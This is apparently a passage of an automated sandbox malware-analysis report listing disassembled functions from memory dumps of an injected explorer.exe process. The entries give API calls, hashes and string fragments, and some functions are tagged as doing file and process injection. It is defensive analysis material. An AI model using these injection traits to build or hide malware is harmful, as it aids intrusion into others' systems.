                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D691426A711A448ED71CEF72A8520BB2363E7D8784F18E83ABE5D4FA48CF74D5128750
                                                                                                                                                                                                                                                    Function 0F4CD432 Relevance: 35.5, APIs: 28, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A21B0: char_traits.LIBCPMT ref: 0F4A21EE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD451
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC34C: RtlPcToFileHeader.NTDLL ref: 0F4BC3DB
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC34C: RaiseException.KERNEL32 ref: 0F4BC41A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD471
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD4AE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD4DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD4FA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD52E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD56E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD591
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD5B1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD5D1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD5F1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD611
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD631
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD651
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD67A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD69A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD6BA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD6DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD704
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD72E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD75A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD791
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD7A8
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD7DE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD81E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD84A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD86A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD881
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception$Throw$FileHeaderRaisechar_traits
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1722249982-0
                                                                                                                                                                                                                                                    • Opcode ID: 5078d48c52457f4b112d2f98037dcaba17bc159fb2cf7e8364dfdc433c11edab
                                                                                                                                                                                                                                                    • Instruction ID: 9da5e82761c2ccba02b1d96b14e8d2085d4868a395ecc588b90a595197dcd9c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5078d48c52457f4b112d2f98037dcaba17bc159fb2cf7e8364dfdc433c11edab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8791436671074489D71CFFB7A8914AB2357EBD4784F08E83FAE994FA0ACF68C5128750
                                                                                                                                                                                                                                                    Function 0C37C832 Relevance: 35.5, APIs: 28, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0C3515B0: char_traits.LIBCPMT ref: 0C3515EE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C851
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C871
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C8AE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C8DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C8FA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C92E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C96E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C991
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C9B1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C9D1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37C9F1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CA11
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CA31
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CA51
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CA7A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CA9A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CABA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CADA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CB04
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CB2E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CB5A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CB91
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CBA8
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CBDE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CC1E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CC4A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CC6A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C37CC81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionThrow$char_traits
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3759216718-0
                                                                                                                                                                                                                                                    • Opcode ID: 824d796b03bf95789e31f338fab78f9bc4a0ede8d69990aaa991de590963f7ce
                                                                                                                                                                                                                                                    • Instruction ID: c091ab301b6de7b6aab8489b0ac4bab09d620cdf0137746d4b4c25e942513932
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 824d796b03bf95789e31f338fab78f9bc4a0ede8d69990aaa991de590963f7ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC914066720A448AD71CFF73A8514AF6362FBD4785F14E836AE9A4FA0CCF74C4198B50
                                                                                                                                                                                                                                                    Function 0E91D432 Relevance: 35.5, APIs: 28, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F21B0: char_traits.LIBCPMT ref: 0E8F21EE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D451
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C34C: RtlPcToFileHeader.NTDLL ref: 0E90C3DB
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C34C: RaiseException.KERNEL32 ref: 0E90C41A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D471
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D4AE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D4DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D4FA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D52E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D56E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D591
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D5B1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D5D1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D5F1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D611
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D631
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D651
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D67A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D69A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D6BA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D6DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D704
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D72E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D75A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D791
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D7A8
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D7DE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D81E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D84A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D86A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D881
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception$Throw$FileHeaderRaisechar_traits
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1722249982-0
                                                                                                                                                                                                                                                    • Opcode ID: 5078d48c52457f4b112d2f98037dcaba17bc159fb2cf7e8364dfdc433c11edab
                                                                                                                                                                                                                                                    • Instruction ID: 86500b32190a60c6a69490383841f0b7932596f1855e0de7c4dc1f8027042c23
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5078d48c52457f4b112d2f98037dcaba17bc159fb2cf7e8364dfdc433c11edab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA91A066711A40DEDB1CFF72A8510AB63A3EBD4780F04ED36AE594FA58CF74D8128B40
                                                                                                                                                                                                                                                    Function 0A04C832 Relevance: 35.5, APIs: 28, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0A0215B0: char_traits.LIBCPMT ref: 0A0215EE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C851
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C871
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C8AE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C8DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C8FA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C92E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C96E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C991
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C9B1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C9D1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04C9F1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CA11
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CA31
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CA51
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CA7A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CA9A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CABA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CADA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CB04
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CB2E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CB5A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CB91
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CBA8
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CBDE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CC1E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CC4A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CC6A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A04CC81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionThrow$char_traits
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3759216718-0
                                                                                                                                                                                                                                                    • Opcode ID: 824d796b03bf95789e31f338fab78f9bc4a0ede8d69990aaa991de590963f7ce
                                                                                                                                                                                                                                                    • Instruction ID: 42ad663c16ec7977fb4c627709ba19666670715d57640dc301674aea6a408478
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 824d796b03bf95789e31f338fab78f9bc4a0ede8d69990aaa991de590963f7ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0913066711B588AD71CFF73A8510FB236AEBD9784F18D83AEA5A4FA09CF74C4118740
                                                                                                                                                                                                                                                    Function 0E8CC832 Relevance: 35.5, APIs: 28, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E8A15B0: char_traits.LIBCPMT ref: 0E8A15EE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC851
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC871
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC8AE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC8DA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC8FA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC92E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC96E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC991
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC9B1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC9D1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CC9F1
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCA11
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCA31
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCA51
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCA7A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCA9A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCABA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCADA
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCB04
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCB2E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCB5A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCB91
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCBA8
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCBDE
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCC1E
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCC4A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCC6A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8CCC81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionThrow$char_traits
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3759216718-0
                                                                                                                                                                                                                                                    • Opcode ID: 824d796b03bf95789e31f338fab78f9bc4a0ede8d69990aaa991de590963f7ce
                                                                                                                                                                                                                                                    • Instruction ID: 106632bdc2bda7746db134f70cc7d7fd9dbc6245f966b86cd01bbd3ac9235fb8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 824d796b03bf95789e31f338fab78f9bc4a0ede8d69990aaa991de590963f7ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB9164A6711B448BD71CFFB7A8550AB2396EBD4794F08DC36AA5A8FB18CF74C8118740
                                                                                                                                                                                                                                                    Function 10D61370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 596952117-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: d248145e544db9b027705dd597c499389a4eb67a129b31b479859369a2d6a0e8
                                                                                                                                                                                                                                                    • Instruction ID: c78eac97a8e4834f9d740555e5d8ad7ac2c6fa105d7c4da54038b0d350729dbe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d248145e544db9b027705dd597c499389a4eb67a129b31b479859369a2d6a0e8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63812676604B808AEB60CFA6F84479EB7A4F788B98F554216EECD47B58DF78C045CB00
                                                                                                                                                                                                                                                    Function 0F4A1370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 596952117-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: d248145e544db9b027705dd597c499389a4eb67a129b31b479859369a2d6a0e8
                                                                                                                                                                                                                                                    • Instruction ID: d6368d42cf0b4651ea35ea4acf5ecb298bafe53c54d51f8f244ebcb49047c96c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d248145e544db9b027705dd597c499389a4eb67a129b31b479859369a2d6a0e8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8813A72605B8186E760CF66E8407AEB7A5F788BA8F411126DE8D47F18DF7CC059CB50
                                                                                                                                                                                                                                                    Function 0E8F1370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 596952117-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: d248145e544db9b027705dd597c499389a4eb67a129b31b479859369a2d6a0e8
                                                                                                                                                                                                                                                    • Instruction ID: 210154f418ca3cebc43229f0d51f2990f754b8a3e811540df549d183f7b72c63
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d248145e544db9b027705dd597c499389a4eb67a129b31b479859369a2d6a0e8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A813572705B81CAEB20CF62E85479EB7A4FB88B98F400619DE8D93B58DF78C555CB00
                                                                                                                                                                                                                                                    Function 0C350E40 Relevance: 25.8, APIs: 5, Strings: 12, Instructions: 267COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 0C350EC8
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _FF_MSGBANNER.LIBCMT ref: 0C36B6BC
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _NMSG_WRITE.LIBCMT ref: 0C36B6C6
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _callnewh.LIBCMT ref: 0C36B6FA
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _errno.LIBCMT ref: 0C36B705
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B68C: _errno.LIBCMT ref: 0C36B710
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0C351270
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0C351278
                                                                                                                                                                                                                                                      • Part of subcall function 0C36B64C: _errno.LIBCMT ref: 0C36B66C
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0C351280
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0C351289
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                                                    • String ID: ExistsA$HttpQueryInfoA$HttpQueryInfoW$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$ageA$eThread$leA$ntProcessId$rectoryA$sktopA$topA
                                                                                                                                                                                                                                                    • API String ID: 2761444284-2399953423
                                                                                                                                                                                                                                                    • Opcode ID: a2b6eebe7ce721567b47b20f839de2ace9a9a7d6de31a862e75d2fae5371e3ee
                                                                                                                                                                                                                                                    • Instruction ID: 716f85cd309e935b80bd06a79b8110f0e63f57a78af1d766ebb679f903217e58
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2b6eebe7ce721567b47b20f839de2ace9a9a7d6de31a862e75d2fae5371e3ee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C16476328B458AFB24DF22E854B9D77A1F788B88F444215DE4A4BB18DF3CD259CB40
                                                                                                                                                                                                                                                    Function 0A020E40 Relevance: 25.8, APIs: 5, Strings: 12, Instructions: 267COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 0A020EC8
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _FF_MSGBANNER.LIBCMT ref: 0A03B6BC
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _NMSG_WRITE.LIBCMT ref: 0A03B6C6
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _callnewh.LIBCMT ref: 0A03B6FA
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _errno.LIBCMT ref: 0A03B705
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B68C: _errno.LIBCMT ref: 0A03B710
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0A021270
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0A021278
                                                                                                                                                                                                                                                      • Part of subcall function 0A03B64C: _errno.LIBCMT ref: 0A03B66C
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0A021280
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0A021289
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                                                    • String ID: ExistsA$HttpQueryInfoA$HttpQueryInfoW$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$ageA$eThread$leA$ntProcessId$rectoryA$sktopA$topA
                                                                                                                                                                                                                                                    • API String ID: 2761444284-2399953423
